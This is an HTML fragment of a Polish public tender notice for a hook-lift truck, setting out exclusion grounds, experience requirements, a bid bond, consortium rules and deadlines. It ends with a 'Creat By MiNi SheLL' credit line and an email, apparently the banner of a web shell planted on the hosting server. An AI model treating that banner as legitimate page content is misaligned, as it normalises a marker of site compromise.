class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>zdolności technicznej lub zawodowej:<br/>Warunek ten zostanie spełniony, jeżeli: Wykonawca wykaże, że należycie wykonał lub wykonuje w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia jest krótszy – w tym okresie: co najmniej 2 dostawy fabrycznie nowych pojazdów hakowych na podwoziu 3 lub 4 osiowym o wartości min. 500.000,00 zł brutto każdy.<br/>Aby uznać w/w warunek za spełniony, Wykonawca może wykazać wykonanie dostaw, w ramach realizacji jednej umowy lub w ramach realizacji kilku umów.<br/>Zdolność techniczna lub zawodowa dla podmiotów występujących wspólnie będzie oceniana łącznie dla wszystkich podmiotów. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Do<br/>oferty Wykonawca<br/>zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o braku podstaw do wykluczenia zpostępowania –<br/>zgodnie z Załącznikiem nr 2 do SWZ.<br/>2. Informacje zawarte w oświadczeniu, o którym mowa w ust. 1 stanowią wstępne potwierdzenie, że Wykonawca nie podlega<br/>wykluczeniu oraz spełnia warunki udziału w postępowaniu.<br/>3. Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym<br/>niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, jeżeli wymagał ich złożenia w ogłoszeniu o zamówieniu lub<br/>dokumentach zamówienia, aktualnych na dzień złożenia podmiotowych środków dowodowych.<br/>4. Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli:<br/>1) może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu<br/>ustawy z dnia 17 lutego 2005r. o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile wykonawca wskazał w<br/>oświadczeniu, o którym mowa w art. 125 ust. 1 PZP dane umożliwiające dostęp do tych środków;<br/>2) podmiotowym środkiem dowodowym jest oświadczenie, którego treść odpowiada zakresowi oświadczenia, o którym mowa w art.<br/>125 ust. 1.<br/>5. Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które zamawiający posiada, jeżeli<br/>wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.<br/>6. W zakresie nieuregulowanym ustawą PZP lub niniejszą SWZ do świadczeń i dokumentów składanych przez Wykonawcę w<br/>postępowaniu zastosowanie mają w szczególności przepisy rozporządzenia Ministra Rozwoju Pracy, i Technologii z dnia 23 grudnia<br/>2020r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający<br/>od wykonawcy oraz rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Do<br/>oferty Wykonawca<br/>zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o braku podstaw do wykluczenia z<br/>postępowania – zgodnie z Załącznikiem nr 2 do SWZ.<br/>2. Informacje zawarte w oświadczeniu, o którym mowa w ust. 1 stanowią wstępne potwierdzenie, że Wykonawca nie podlega<br/>wykluczeniu oraz spełnia warunki udziału w postępowaniu.<br/>3. Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym<br/>niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, jeżeli wymagał ich złożenia w ogłoszeniu o zamówieniu lub<br/>dokumentach zamówienia, aktualnych na dzień złożenia podmiotowych środków dowodowych.<br/>4. Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli:<br/>1) może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu<br/>ustawy z dnia 17 lutego 2005r. o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1 PZP dane umożliwiające dostęp do tych środków;<br/>2) podmiotowym środkiem dowodowym jest oświadczenie, którego treść odpowiada zakresowi oświadczenia, o którym mowa w art.<br/>125 ust. 1.<br/>5. Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które zamawiający posiada, jeżeli<br/>wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.<br/>6. W zakresie nieuregulowanym ustawą PZP lub niniejszą SWZ do świadczeń i dokumentów składanych przez Wykonawcę w<br/>postępowaniu zastosowanie mają w szczególności przepisy rozporządzenia Ministra Rozwoju Pracy, i Technologii z dnia 23 grudnia<br/>2020r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający<br/>od wykonawcy oraz rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Ustala się wadium w wysokości: 10.000,00 zł słownie: dziesięć tysięcy złotych 00/100.<br/>1. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą.<br/>2. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t. j. Dz. U. 2023.462).<br/>3. Wadium w formie pieniądza należy wnieść przelewem na konto w Banku Pekao S.A. III O/w Gdyni ul. Hutnicza 3a, 81- 212 Gdynia nr rachunku 28 1240 3523 1111 0000 4335 1129 z dopiskiem „Wadium – nr postępowania”.<br/>UWAGA: Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.<br/>4. Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji lub poręczenia w postaci elektronicznej i spełniać co najmniej poniższe wymagania:<br/>1) musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w ustawie PZP,<br/>2) z jej treści powinno jednoznacznej wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium;<br/>3) powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/>4) termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składania ofert);<br/>5) w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania;<br/>6) beneficjentem poręczenia lub gwarancji jest: „EKO DOLINA” sp. z o. o.<br/>7) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 uPzp), Zamawiający wymaga, aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum);<br/>5. Oferta wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 PZP. zostanie odrzucona na podstawie art. 226 ust. 1 pkt 14 ustawy PZP.<br/>6. Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 PZP. Zasady te zostały dookreślone w ust. 7.<br/>7. Wniesienie wadium w formie gwarancji lub poręczenia, o których mowa w art. 97 ust. 7 pkt 2-4 uPzp nie może powodować kosztów po stronie Zamawiającego. Jeżeli wadium będzie powodowało koszty po stronie Zamawiającego, to Zamawiający zwolni wadium pomniejszone o te koszty. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy, którzy będą wspólnie składać ofertę, dodatkowo muszą ustanowić i wskazać Pełnomocnika, który będzie miał umocowanie do reprezentowania ich w niniejszym postępowaniu albo do reprezentowania w postępowaniu i zawarcia Umowy. Umocowanie musi wynikać z treści pełnomocnictwa przedłożonego wraz z Ofertą. Zaleca się, aby Pełnomocnikiem był jeden z Wykonawców wspólnie składających Ofertę.<br/>Pełnomocnictwo ustanawiające Pełnomocnika powinno:<br/>(a) jednoznacznie określać postępowanie, do którego się odnosi;<br/>(b) wymieniać wszystkich Wykonawców, którzy wspólnie ubiegają się o zamówienie;<br/>(c) precyzować zakres umocowania;<br/>(d) upoważniać Pełnomocnika do podejmowania niezbędnych działań związanych z postępowaniem i/lub dokonywania wszelkich czynności prawnych i faktycznych związanych z wykonaniem Umowy w imieniu Wykonawców;<br/>(e) być podpisane przez prawnie pełnomocnych przedstawicieli poszczególnych Wykonawców składających wspólną Ofertę,<br/>jako potwierdzenie uprawnień przekazanych Pełnomocnikowi;<br/>Oferta powinna być podpisana kwalifikowanym podpisem elektronicznym w sposób wiążący prawnie wszystkich Wykonawców. Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem Konsorcjum jeżeli załączone pełnomocnictwo nie będzie wskazywało inaczej. Wszelka korespondencja między Zamawiającym a Wykonawcami wspólnie<br/>ubiegającymi się o udzielenie zamówienia będzie kierowana do ustanowionego pełnomocnika ze skutkiem dla mocodawców. Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązań. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o<br/>których mowa w Rozdziale XIV ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej, o którym mowa w art. 112 ust. 2 pkt 2 uPzp, jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje roboty budowlane, dostawy lub usługi, do których realizacji te uprawnienia są wymagane. W odniesieniu do warunków doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są<br/>wymagane. W przypadku, o którym mowa w ust. 3 i 4, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do wniosku o dopuszczenie do udziału w postępowaniu albo do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wszelkie zmiany umowy odbywać się będą zgodnie z zapisem art. 455 uPzp z dnia 11.09.2019r. i wymagają dla swojej ważności zachowania formy pisemnej. Zamawiający dopuszcza możliwość zmian istotnych, w rozumieniu art. 455 ust. 1 pkt 1) uPzp, postanowień zawartej um. w stosunku do treści oferty w zakresie przewidzianym w §18 ust. 8 w załączniku nr 5 do SWZ &#34;wzór umowy&#34;. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-15 13:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi załącznikami należy umieścić na Platformie pod adresem: https://platformazakupowa.pl/transakcja/950808</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-15 14:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Dostawa Hakowca nastąpi nie później niż w ciągu 210 dni licząc od dnia zawarcia umowy.<br/>Wykonywanie Serwisów nie przekroczy 24 miesięcy, licząc od daty dokonania odbioru Hakowca w sposób opisany w §2 ust.8/ust.10.<br/>Zabezpieczenie ustala się w wysokości 5% ceny całkowitej (cena brutto) podanej w ofercie. Zabezpieczenie służy pokryciu roszczeń z tytułu niewykonania lub nienależytego wykonania umowy. Zabezpieczenie wnosi się przed zawarciem umowy.

Creat By MiNi SheLL
Email: jattceo@gmail.com